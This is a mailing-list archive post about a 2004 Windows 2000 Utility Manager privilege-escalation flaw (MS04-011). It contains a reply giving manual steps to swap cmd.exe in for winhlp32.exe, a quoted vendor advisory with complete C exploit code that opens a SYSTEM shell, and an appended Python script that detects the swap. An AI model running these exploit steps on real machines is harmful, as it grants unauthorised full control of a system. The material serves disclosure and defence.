Full Disclosure mailing list archives
Re: Norton AntiVirus nested file manual scan bypass.....
From: natch <lists () natch net>
Date: Mon, 19 Apr 2004 12:49:26 -0400
Nice, but the faster method is to copy \winnt\system32\cmd.exe to \winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1. When the command prompt comes up it has elevated privileges. From there you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a new account.
No external program needed. The microsoft patch simply removes the contextual help.
- natch

Vivek Rathod (Application Security, Inc.) wrote:
Microsoft Windows Utility Manager Vulnerability
April 13, 2004
Risk Level: High

Summary:
A local elevation of privileges vulnerability exists in the Windows Utility Manager that allows any user to take complete control over the operating system.

Versions Affected:
All products in the Windows 2000 operating system family.

Details:
Microsoft Windows 2000 contains support for Accessibility options within the operating system. Accessibility support is a series of assistive technologies within Windows that allow users with disabilities to still be able to access the functions of the operating system. Accessibility support is enabled or disabled through shortcuts built into the operating system, or through the Accessibility Utility Manager.

The Utility Manager is an accessibility utility that allows users to check the status of Accessibility programs (Magnifier, Narrator, On-Screen Keyboard) and start or stop them. The Utility Manager can be invoked by pressing Windows Key + U or executing "utilman.exe /start" from the command line. The Utility Manager Service is enabled by default and runs in the interactive desktop with Local System privileges.

The Utility Manager has support for context sensitive help. Users can access this by clicking on the "?" on the title bar and then on an object, or by pressing the F1 key after selecting an object. In order to display the help, Utility Manager loads winhlp32.exe but does not drop System privileges. Therefore, winhlp32.exe is executed under the Local System account. While winhlp32.exe is executing it is possible to send Windows messages to it and attack it with "Shatter" style attacks.

Winhlp32.exe is executed with its main window hidden, but it is very trivial to make it visible. Once the window is made visible, a typical attack would involve using the "File Open" dialog to execute a program such as "cmd.exe". Since the Help window has Local System privileges, the executed program will have the same privileges.
Further information is available at:
http://www.appsecinc.com/resources/alerts/general/04-0001.html
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Fix:
http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

Acknowledgments:
Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application Security, Inc. (http://www.appsecinc.com) and to Brett Moore of Security-Assessment.com (http://security-assessment.com).

Please find the proof-of-concept exploit code attached.

___________________________________________
AppSecInc Team SHATTER
Tel: 1-866-927-7732
E-mail: shatter () appsecinc com
Web: www.appsecinc.com
Application Security, Inc.
"Securing Business by Securing Enterprise Applications"
------------------------------------------------------------------------

// By Cesar Cerrudo (cesar () appsecinc com)
// Local elevation of privileges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.
// (Build as an ANSI project: the window titles and sText are narrow strings.)

#include <stdio.h>
#include <windows.h>
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[])
{
    HWND lHandle, lHandle2;
    POINT point;
    char sText[] = "%windir%\\system32\\cmd.ex?";

    // run utility manager
    system("utilman.exe /start");
    Sleep(500);

    // execute contextual help
    SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
    Sleep(500);

    // open file open dialog window in Windows Help
    PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
    Sleep(500);

    // find open file dialog window
    lHandle = FindWindow("#32770", "Open");
    // get input box handle
    lHandle2 = GetDlgItem(lHandle, 0x47C);
    Sleep(500);

    // set text to filter listview to display only cmd.exe
    SendMessage(lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
    Sleep(800);
    // send return
    SendMessage(lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

    // get navigation bar handle
    lHandle2 = GetDlgItem(lHandle, 0x4A0);
    // send tab
    SendMessage(lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    Sleep(500);

    lHandle2 = FindWindowEx(lHandle, NULL, "SHELLDLL_DefView", NULL);
    // get list view handle
    lHandle2 = GetDlgItem(lHandle2, 0x1);
    SendMessage(lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
    SendMessage(lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
    SendMessage(lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
    Sleep(500);

    // popup context menu
    PostMessage(lHandle2, WM_CONTEXTMENU, 0, 0);
    Sleep(1000);

    // get context menu handle
    point.x = 10;
    point.y = 30;
    lHandle2 = WindowFromPoint(point);
    SendMessage(lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
    SendMessage(lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
    SendMessage(lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

    SendMessage(lHandle, WM_CLOSE, 0, 0); // close open file dialog window
    return 0;
}
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
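Both routes in the thread end with Utility Manager launching winhlp32.exe as Local System: the advisory's exploit drives a genuine winhlp32.exe with window messages, while natch's shortcut simply makes winhlp32.exe be cmd.exe. The binary that gets launched is therefore worth auditing on any unpatched host. What follows is an added example written for this page, not code from the thread, AppSecInc or Microsoft. It flags a winhlp32.exe that is byte-identical to cmd.exe, or whose SHA-256 is not on a known-good list. The Windows 2000 layout it assumes (%SystemRoot%\winhlp32.exe and %SystemRoot%\system32\cmd.exe), the known-good hash set, and the fixture files it builds are all assumptions; the fixtures are constructed stand-ins, not real PE images.

```python
"""Audit the help binary Utility Manager launches as Local System.

Added example for the Utility Manager thread; assumptions are marked inline.
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Stream the file through SHA-256 (PE images can be large)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_help_binary(windir, known_good=None):
    """Return a list of findings for the winhlp32.exe under `windir`.

    windir:     assumed to be %SystemRoot% (e.g. C:\\WINNT on Windows 2000),
                where winhlp32.exe lives; cmd.exe is looked up in system32.
    known_good: set of acceptable SHA-256 hashes of the vendor winhlp32.exe
                (assumption: collected from install media or a clean host);
                None skips that check.
    """
    winhlp = os.path.join(windir, "winhlp32.exe")
    cmd = os.path.join(windir, "system32", "cmd.exe")
    if not os.path.isfile(winhlp):
        return ["winhlp32.exe is missing from %s" % windir]
    findings = []
    help_hash = sha256_of(winhlp)
    # natch's variant: the help binary is literally a copy of cmd.exe
    if os.path.isfile(cmd) and help_hash == sha256_of(cmd):
        findings.append("winhlp32.exe is byte-identical to cmd.exe")
    # anything else that is not the vendor binary is just as suspicious
    if known_good is not None and help_hash not in known_good:
        findings.append("winhlp32.exe hash %s is not on the known-good list" % help_hash)
    return findings


# --- constructed fixtures (stand-ins for real binaries, not PE images) ------
FAKE_WINHLP = b"MZ constructed winhlp32.exe stand-in for the example\n"
FAKE_CMD = b"MZ constructed cmd.exe stand-in for the example\n"


def build_tree(root, swapped):
    """Lay out a minimal %SystemRoot% with a genuine or swapped winhlp32.exe."""
    os.makedirs(os.path.join(root, "system32"), exist_ok=True)
    with open(os.path.join(root, "system32", "cmd.exe"), "wb") as f:
        f.write(FAKE_CMD)
    with open(os.path.join(root, "winhlp32.exe"), "wb") as f:
        f.write(FAKE_CMD if swapped else FAKE_WINHLP)
    return root


def demo():
    """Audit a clean tree and a tampered tree; returns (clean, swapped) findings."""
    good = {hashlib.sha256(FAKE_WINHLP).hexdigest()}  # assumed known-good set
    with tempfile.TemporaryDirectory() as tmp:
        clean = audit_help_binary(build_tree(os.path.join(tmp, "clean"), False), good)
        swapped = audit_help_binary(build_tree(os.path.join(tmp, "swapped"), True), good)
    return clean, swapped


if __name__ == "__main__":
    for label, result in zip(("clean", "swapped"), demo()):
        print("%s: %s" % (label, result or "no findings"))
```

On a real host, point `audit_help_binary` at %SystemRoot% and pass hashes taken from a trusted copy of winhlp32.exe; the equality check alone catches only the copy-cmd.exe variant, so the known-good list is what makes the check useful against an arbitrary replacement. Neither check addresses the advisory's message-based attack on a genuine winhlp32.exe; for that the MS04-011 update, which removes the contextual help, is the fix.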
Current thread:
- Norton AntiVirus nested file manual scan bypass..... bipin gautam (Apr 17)
- Re: Norton AntiVirus nested file manual scan bypass.....[silent patch???] bipin gautam (Apr 17)
- Re: Norton AntiVirus nested file manual scan bypass..... natch (Apr 19)
- Re: Norton AntiVirus nested file manual scan bypass..... Esteban Martínez Fayó (Apr 21)